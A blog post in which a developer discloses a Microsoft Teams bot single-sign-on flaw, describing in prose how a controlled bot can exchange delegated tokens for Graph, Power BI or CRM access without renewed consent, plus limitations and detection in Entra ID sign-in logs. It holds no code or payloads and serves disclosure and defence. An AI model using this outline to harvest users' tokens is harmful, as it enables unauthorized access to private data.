In this article, I share my experience discovering a security bug in Microsoft Teams apps that can break single-sign-on mechanisms.
Introduction
Hello!
I'm Azizkhon Ishankhonov, and I specialize in building solutions using Microsoft technologies.
Previously, I posted an article about AI-bot development with .NET, where I briefly covered authentication and a single-sign-on mechanism using the Azure Bot service.
Today, I want to share my findings about a security bug I discovered in MS Teams bots/applications.
In accordance with the coordinated vulnerability disclosure policy, I reported this security bug through the Microsoft Researcher Portal. However, they assessed the case as moderate severity, which means a fix is not an immediate servicing priority according to the Microsoft severity bar.
My personal opinion differs from that of the Microsoft engineers. I believe this vulnerability could serve as a gateway to breach security barriers, allowing unauthorized access to a user's personal/private information, even if an administrator has approved the application.
To make this clear and easy to understand, I want to demonstrate it with real-world samples and cases so that security engineers and tenant administrators can assess the severity and protect their tenants.
Issue
The starting point here is the official samples and their references:
Bot Teams Authentication
Bot SSO Setup

The Microsoft Bot Framework has a great feature that allows for easy integration of the SSO mechanism into an app. While researching this feature, I discovered a flaw. Under certain conditions, it's possible to obtain an access token on behalf of a user without their explicit consent for that specific action.
This felt wrong. Since the Bot Framework API and libraries are open-source, I suspected it might be possible to manipulate the authentication flow. I was right.
The Core of the Vulnerability
The exploit works by breaking the expected authentication sequence. Here’s how:
Token Exchange: A delegated token obtained for the bot application can be exchanged for a token for another, higher-value application (like Graph API, Power BI, or Dynamics CRM).
Silent Initiation: An attacker does not need to wait for a user to interact with a bot. They can proactively send a specially crafted authentication card directly to the user’s personal chat. The same approach also works in group chats. A sign-in link generated for a personal chat could previously be used inside a group chat, but after I reported this behavior to MSRC, that type of sign-in card is no longer accepted..
Manual Payloads: The payloads used for the Bot Framework API can be built manually, allowing an attacker to control the authentication flow.
Bypassed Consent: Once a user has given initial consent to the application, the bot will not ask for consent again for subsequent requests, even if the list of required permissions has changed. Microsoft has since fixed an issue where some apps would not even ask for consent upon installation, which is a positive change.
The result is that if someone gains control of a bot, they can potentially access all the resources (API permission scopes) that the bot is authorized to use, even if those permissions are delegated.
Limitations
There are some conditions for this exploit to work:
The malicious bot application must be uploaded to the organization's app store, which requires a certain level of privilege.
Alternatively, the app could be uploaded via a manifest
.zipfile directly to a user's MS Teams instance, but it would only affect users of that specific app.
Cases
Let's say that your company wants to build an AI assistant that will help high-level managers make their routines easier. For example, an AI bot that can search through a user's emails, files, Power BI reports, and Dynamics CRM data and provide answers based on the retrieved data.
Well, for tenant administrators, that might not look strange or raise security concerns since the bot will only require delegated permissions, which are mostly assumed to require user consent.
Unfortunately, the issue described above allows someone who controls the bot to get private, sensitive information on behalf of a user. Let's say managers have a file or a Power BI dashboard that contains information about whom they will fire, or financial reports for the chairman.
Concerns
I'm mostly concerned about the apps that are pre-installed in MS Teams by default. Potentially, any of them could be used to get access to private information, and there are hundreds of pre-installed applications with high privilege levels and I don't think tenant administrators has time to review all of them.

Let's review one of the most popular apps( just as a sample), which I believe is used by millions of people around the world:

This implies that if a major vendor like Adobe were compromised or had malicious intent, they could potentially access a competing company's sensitive files, emails, and call data through employees who use the integrated Adobe app in MS Teams.
Detecting Silent Token Requests
To identify which apps are silently requesting tokens, you can go to the sign-in events in the Microsoft Entra ID admin portal. Look for activities like the one in the screenshot below; this activity coincides with the token exchange sequence.

Summary
It would be naive to assume I am the only one who has discovered this vulnerability.
I hope the information provided is sufficient as a start point for users and administrators to take appropriate action to protect their information. I am disappointed with Microsoft's decision not to address this vulnerability immediately. Therefore, for any future security issues I discover, I will likely consider reporting them on alternative platforms rather than exclusively through the Microsoft Security Response Center.
